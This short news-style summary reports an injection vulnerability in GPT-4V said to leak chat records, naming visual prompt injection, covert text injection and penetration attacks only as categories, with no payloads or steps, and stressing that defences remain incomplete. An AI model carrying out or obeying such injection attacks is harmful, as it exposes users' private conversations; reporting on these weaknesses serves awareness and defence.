The recent revelation of an injection attack vulnerability in GPT-4V has led to the leakage of chat records, garnering widespread attention. The attack methods include visual prompt injection, covert text injection, and penetration attacks, highlighting the vulnerability of large models to such threats. Although there are some security measures in place, they have not fully addressed the issue, underscoring the defensive challenges posed by large AI models. There is currently no definitive solution, and this issue requires further research and prevention measures.